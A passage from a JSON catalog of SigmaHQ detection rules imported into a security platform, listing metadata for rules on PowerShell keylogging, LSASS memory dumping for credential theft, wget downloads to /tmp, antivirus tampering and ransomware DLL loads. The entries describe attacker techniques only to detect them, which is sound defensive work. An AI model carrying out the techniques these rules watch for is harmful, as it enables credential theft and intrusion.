"detections/sigma-imports/_quarantine/powershell-keylogging.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "34f90d3c-c297-49e9-b26d-911b05a4866c", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/powershell/powershell_script/posh_ps_keylogging.yml" } }, { "id": "sigmahq-sigma-350dfb37-3706-4cdc-9e2e-5e24bc3a46df", "type": "detection", "name": "MSSQL Disable Audit Settings", "description": "Detects when an attacker calls the \"ALTER SERVER AUDIT\" or \"DROP SERVER AUDIT\" transaction in order to delete or disable audit logs on the server", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/mssql-disable-audit-settings.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "350dfb37-3706-4cdc-9e2e-5e24bc3a46df", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/builtin/application/mssqlserver/win_mssql_disable_audit_settings.yml" } }, { "id": "sigmahq-sigma-352a54e1-74ba-4929-9d47-8193d67aba1e", "type": "detection", "name": "Azure Domain Federation Settings Modified", "description": "Identifies when an user or application modified the federation settings on the domain.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1078" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/azure-domain-federation-settings-modified.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "352a54e1-74ba-4929-9d47-8193d67aba1e", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/cloud/azure/audit_logs/azure_federation_modified.yml" } }, { "id": "sigmahq-sigma-352a918a-34d8-4882-8470-44830c507aa3", "type": "detection", "name": "Malicious Usage Of IMDS Credentials Outside Of AWS Infrastructure", "description": "Detects when an instance identity has taken an action that isn't inside SSM.\nThis can indicate that a compromised EC2 instance is being used as a pivot point.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1078", "T1078.002" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/malicious-usage-of-imds-credentials-outside-of-aws-infrastructure.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "352a918a-34d8-4882-8470-44830c507aa3", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/cloud/aws/cloudtrail/aws_cloudtrail_imds_malicious_usage.yml" } }, { "id": "sigmahq-sigma-3569aefd-e535-4391-8c18-24bd01a21eaf", "type": "detection", "name": "Suspicious Email Delivered In Microsoft 365", "description": "Detects instances where an email, identified as malicious or suspicious by the Microsoft Defender for Office 365 (formerly ATP) engine, was delivered to a user's Inbox or Junk folder.\nIt might indicate that a potential threat, such as a spearphishing attachment or links, has bypassed initial blocking mechanisms and reached an end-user, requiring further investigation and potential remediation.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1566.001", "T1566.002" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-email-delivered-in-microsoft-365.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "3569aefd-e535-4391-8c18-24bd01a21eaf", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/cloud/m365/audit/microsoft365_suspicious_email_delivered.yml" } }, { "id": "sigmahq-sigma-35a05c60-9012-49b6-a11f-6bab741c9f74", "type": "detection", "name": "Wget Creating Files in Tmp Directory", "description": "Detects the use of wget to download content in a temporary directory such as \"/tmp\" or \"/var/tmp\"", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1105" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/wget-creating-files-in-tmp-directory.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "35a05c60-9012-49b6-a11f-6bab741c9f74", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/linux/file_event/file_event_lnx_wget_download_file_in_tmp_dir.yml" } }, { "id": "sigmahq-sigma-35b781cc-1a08-4a5a-80af-42fd7c315c6b", "type": "detection", "name": "Discovery Using AzureHound", "description": "Detects AzureHound (A BloodHound data collector for Microsoft Azure) activity via the default User-Agent that is used during its operation after successful authentication.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1087.004", "T1526" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/discovery-using-azurehound.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "35b781cc-1a08-4a5a-80af-42fd7c315c6b", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/cloud/azure/signin_logs/azure_ad_azurehound_discovery.yml" } }, { "id": "sigmahq-sigma-35ba1d85-724d-42a3-889f-2e2362bcaf23", "type": "detection", "name": "AD Privileged Users or Groups Reconnaissance", "description": "Detect priv users or groups recon based on 4661 eventid and known privileged users or groups SIDs", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1087.002" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/ad-privileged-users-or-groups-reconnaissance.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "35ba1d85-724d-42a3-889f-2e2362bcaf23", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/builtin/security/win_security_account_discovery.yml" } }, { "id": "sigmahq-sigma-35bc7e28-ee6b-492f-ab04-da58fcf6402e", "type": "detection", "name": "Windows Network Access Suspicious desktop.ini Action", "description": "Detects unusual processes accessing desktop.ini remotely over network share, which can be leveraged to alter how Explorer displays a folder's content (i.e. renaming files) without changing them on disk.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1547.009" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/windows-network-access-suspicious-desktop-ini-action.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "35bc7e28-ee6b-492f-ab04-da58fcf6402e", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/builtin/security/win_security_net_share_obj_susp_desktop_ini.yml" } }, { "id": "sigmahq-sigma-35c55673-84ca-4e99-8d09-e334f3c29539", "type": "detection", "name": "Remote Registry Lateral Movement", "description": "Detects remote RPC calls to modify the registry and possible execute code", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1112" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/remote-registry-lateral-movement.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "35c55673-84ca-4e99-8d09-e334f3c29539", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/application/rpc_firewall/rpc_firewall_remote_registry_lateral_movement.yml" } }, { "id": "sigmahq-sigma-35f41cd7-c98e-469f-8a02-ec4ba0cc7a7e", "type": "detection", "name": "PowerShell Write-EventLog Usage", "description": "Detects usage of the \"Write-EventLog\" cmdlet with 'RawData' flag. The cmdlet can be levreage to write malicious payloads to the EventLog and then retrieve them later for later use", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/powershell-write-eventlog-usage.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "35f41cd7-c98e-469f-8a02-ec4ba0cc7a7e", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/powershell/powershell_script/posh_ps_susp_write_eventlog.yml" } }, { "id": "sigmahq-sigma-3603f18a-ec15-43a1-9af2-d196c8a7fec6", "type": "detection", "name": "System Integrity Protection (SIP) Disabled", "description": "Detects the use of csrutil to disable the Configure System Integrity Protection (SIP). This technique is used in post-exploit scenarios.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1518.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/system-integrity-protection-sip-disabled.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "3603f18a-ec15-43a1-9af2-d196c8a7fec6", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/macos/process_creation/proc_creation_macos_csrutil_disable.yml" } }, { "id": "sigmahq-sigma-360a1340-398a-46b6-8d06-99b905dc69d2", "type": "detection", "name": "Windows Defender Grace Period Expired", "description": "Detects the expiration of the grace period of Windows Defender. This means protection against viruses, spyware, and other potentially unwanted software is disabled.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "endpoint", "mitre_techniques": [ "T1685" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": true, "path": "detections/sigma-imports/endpoint/windows-defender-grace-period-expired.yaml", "provenance": { "source": "SigmaHQ/sigma", "source_id": "360a1340-398a-46b6-8d06-99b905dc69d2", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/builtin/windefend/win_defender_antimalware_platform_expired.yml" } }, { "id": "sigmahq-sigma-36210e0d-5b19-485d-a087-c096088885f0", "type": "detection", "name": "Suspicious PowerShell Parameter Substring", "description": "Detects suspicious PowerShell invocation with a parameter substring", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1059.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-powershell-parameter-substring.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "36210e0d-5b19-485d-a087-c096088885f0", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_powershell_susp_parameter_variation.yml" } }, { "id": "sigmahq-sigma-36388120-b3f1-4ce9-b50b-280d9a7f4c04", "type": "detection", "name": "Kaspersky Endpoint Security Stopped Via CommandLine - Linux", "description": "Detects execution of the Kaspersky init.d stop script on Linux systems either directly or via systemctl.\nThis activity may indicate a manual interruption of the antivirus service by an administrator, or it could be a sign of potential tampering or evasion attempts by malicious actors.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1685" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/kaspersky-endpoint-security-stopped-via-commandline-linux.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "36388120-b3f1-4ce9-b50b-280d9a7f4c04", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/linux/process_creation/proc_creation_lnx_av_kaspersky_av_disabled.yml" } }, { "id": "sigmahq-sigma-363eccc0-279a-4ccf-a3ab-24c2e63b11fb", "type": "detection", "name": "Powershell Create Scheduled Task", "description": "Adversaries may abuse the Windows Task Scheduler to perform task scheduling for initial or recurring execution of malicious code", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1053.005" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/powershell-create-scheduled-task.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "363eccc0-279a-4ccf-a3ab-24c2e63b11fb", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/powershell/powershell_script/posh_ps_cmdlet_scheduled_task.yml" } }, { "id": "sigmahq-sigma-36440e1c-5c22-467a-889b-593e66498472", "type": "detection", "name": "Malicious IP Address Sign-In Suspicious", "description": "Indicates sign-in from a malicious IP address known to be malicious at time of sign-in.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1090" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/malicious-ip-address-sign-in-suspicious.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "36440e1c-5c22-467a-889b-593e66498472", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/cloud/azure/identity_protection/azure_identity_protection_malicious_ip_address_suspicious.yml" } }, { "id": "sigmahq-sigma-36475a7d-0f6d-4dce-9b01-6aeb473bbaf1", "type": "detection", "name": "SyncAppvPublishingServer VBS Execute Arbitrary PowerShell Code", "description": "Executes arbitrary PowerShell code using SyncAppvPublishingServer.vbs", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1218", "T1216" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/syncappvpublishingserver-vbs-execute-arbitrary-powershell-code.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "36475a7d-0f6d-4dce-9b01-6aeb473bbaf1", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_lolbin_syncappvpublishingserver_vbs_execute_psh.yml" } }, { "id": "sigmahq-sigma-36480ae1-a1cb-4eaa-a0d6-29801d7e9142", "type": "detection", "name": "Potential Defense Evasion Via Binary Rename", "description": "Detects the execution of a renamed binary often used by attackers or malware leveraging new Sysmon OriginalFileName datapoint.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1036.003" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potential-defense-evasion-via-binary-rename.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "36480ae1-a1cb-4eaa-a0d6-29801d7e9142", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_renamed_binary.yml" } }, { "id": "sigmahq-sigma-3669afd2-9891-4534-a626-e5cf03810a61", "type": "detection", "name": "Load Of RstrtMgr.DLL By An Uncommon Process", "description": "Detects the load of RstrtMgr DLL (Restart Manager) by an uncommon process.\nThis library has been used during ransomware campaigns to kill processes that would prevent file encryption by locking them (e.g. Conti ransomware, Cactus ransomware). It has also recently been seen used by the BiBi wiper for Windows.\nIt could also be used for anti-analysis purposes by shut downing specific processes.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "low", "category": "_quarantine", "mitre_techniques": [ "T1486", "T1685" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/load-of-rstrtmgr-dll-by-an-uncommon-process.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "3669afd2-9891-4534-a626-e5cf03810a61", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/image_load/image_load_dll_rstrtmgr_uncommon_load.yml" } }, { "id": "sigmahq-sigma-36803969-5421-41ec-b92f-8500f79c23b0", "type": "detection", "name": "Potential Persistence Via GlobalFlags", "description": "Detects registry persistence technique using the GlobalFlags and SilentProcessExit keys", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1546.012" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potential-persistence-via-globalflags.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "36803969-5421-41ec-b92f-8500f79c23b0", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/registry/registry_set/registry_set_persistence_globalflags.yml" } }, { "id": "sigmahq-sigma-36aa86ca-fd9d-4456-814e-d3b1b8e1e0bb", "type": "detection", "name": "Relevant ClamAV Message", "description": "Detects relevant ClamAV messages", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "endpoint", "mitre_techniques": [ "T1588.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": true, "path": "detections/sigma-imports/endpoint/relevant-clamav-message.yaml", "provenance": { "source": "SigmaHQ/sigma", "source_id": "36aa86ca-fd9d-4456-814e-d3b1b8e1e0bb", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/linux/builtin/clamav/lnx_clamav_relevant_message.yml" } }, { "id": "sigmahq-sigma-36bed6b2-e9a0-4fff-beeb-413a92b86138", "type": "detection", "name": "Active Directory Computers Enumeration With Get-AdComputer", "description": "Detects usage of the \"Get-AdComputer\" to enumerate Computers or properties within Active Directory.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "low", "category": "_quarantine", "mitre_techniques": [ "T1018", "T1087.002" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/active-directory-computers-enumeration-with-get-adcomputer.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "36bed6b2-e9a0-4fff-beeb-413a92b86138", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/powershell/powershell_script/posh_ps_get_adcomputer.yml" } }, { "id": "sigmahq-sigma-36d88494-1d43-4dc0-b3fa-35c8fea0ca9d", "type": "detection", "name": "HackTool - CreateMiniDump Execution", "description": "Detects the use of CreateMiniDump hack tool used to dump the LSASS process memory for credential extraction on the attacker's machine", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1003.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/hacktool-createminidump-execution.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "36d88494-1d43-4dc0-b3fa-35c8fea0ca9d", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_hktl_createminidump.yml" } }, { "id": "sigmahq-sigma-36e037c4-c228-4866-b6a3-48eb292b9955", "type": "detection", "name": "DNS Query Request By Regsvr32.EXE", "description": "Detects DNS queries initiated by \"Regsvr32.exe\"", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1559.001", "T1218.010" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/dns-query-request-by-regsvr32-exe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "36e037c4-c228-4866-b6a3-48eb292b9955", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/dns_query/dns_query_win_regsvr32_dns_query.yml" } }, { "id": "sigmahq-sigma-36fbec91-fa1b-4d5d-8df1-8d8edcb632ad", "type": "detection", "name": "Code Executed Via Office Add-in XLL File", "description": "Adversaries may abuse Microsoft Office add-ins to obtain persistence on a compromised system.\nOffice add-ins can be used to add functionality to Office programs", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1137.006" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/code-executed-via-office-add-in-xll-file.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "36fbec91-fa1b-4d5d-8df1-8d8edcb632ad", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/powershell/powershell_script/posh_ps_office_comobject_registerxll.yml" } }, { "id": "sigmahq-sigma-37222991-11e9-4b6d-8bdf-60fbe48f753e", "type": "detection", "name": "Overwriting the File with Dev Zero or Null", "description": "Detects overwriting (effectively wiping/deleting) of a file.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "low", "category": "endpoint", "mitre_techniques": [ "T1485" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": true, "path": "detections/sigma-imports/endpoint/overwriting-the-file-with-dev-zero-or-null.yaml", "provenance": { "source": "SigmaHQ/sigma", "source_id": "37222991-11e9-4b6d-8bdf-60fbe48f753e", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/linux/auditd/execve/lnx_auditd_dd_delete_file.yml" } }, { "id": "sigmahq-sigma-3735d5ac-d770-4da0-99ff-156b180bc600", "type": "detection", "name": "Potential CCleanerReactivator.DLL Sideloading", "description": "Detects potential DLL sideloading of \"CCleanerReactivator.dll\"", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1574.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potential-ccleanerreactivator-dll-sideloading.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "3735d5ac-d770-4da0-99ff-156b180bc600", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/image_load/image_load_side_load_ccleaner_reactivator.yml" } }, { "id": "sigmahq-sigma-3761e026-f259-44e6-8826-719ed8079408", "type": "detection", "name": "Linux Network Service Scanning - Auditd", "description": "Detects enumeration of local or remote network services.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "low", "category": "_quarantine", "mitre_techniques": [ "T1046" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/linux-network-service-scanning-auditd.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "3761e026-f259-44e6-8826-719ed8079408", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/linux/auditd/syscall/lnx_auditd_network_service_scanning.yml" } }, { "id": "sigmahq-sigma-37651c2a-42cd-4a69-ae0d-22a4349aa04a", "type": "detection", "name": "Unsigned AppX Installation Attempt Using Add-AppxPackage", "description": "Detects usage of the \"Add-AppxPackage\" or it's alias \"Add-AppPackage\" to install unsigned AppX packages", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/unsigned-appx-installation-attempt-using-add-appxpackage.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "37651c2a-42cd-4a69-ae0d-22a4349aa04a", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_powershell_install_unsigned_appx_packages.yml" } }, { "id": "sigmahq-sigma-37774c23-25a1-4adb-bb6d-8bb9fd59c0f8", "type": "detection", "name": "Suspicious Volume Shadow Copy Vssapi.dll Load", "description": "Detects the image load of VSS DLL by uncommon executables", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1490" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-volume-shadow-copy-vssapi-dll-load.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "37774c23-25a1-4adb-bb6d-8bb9fd59c0f8", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/image_load/image_load_dll_vssapi_susp_load.yml" } }, { "id": "sigmahq-sigma-377f33a1-4b36-4ee1-acee-1dbe4b43cfbe", "type": "detection", "name": "Suspicious VSFTPD Error Messages", "description": "Detects suspicious VSFTPD error messages that indicate a fatal or suspicious error that could be caused by exploiting 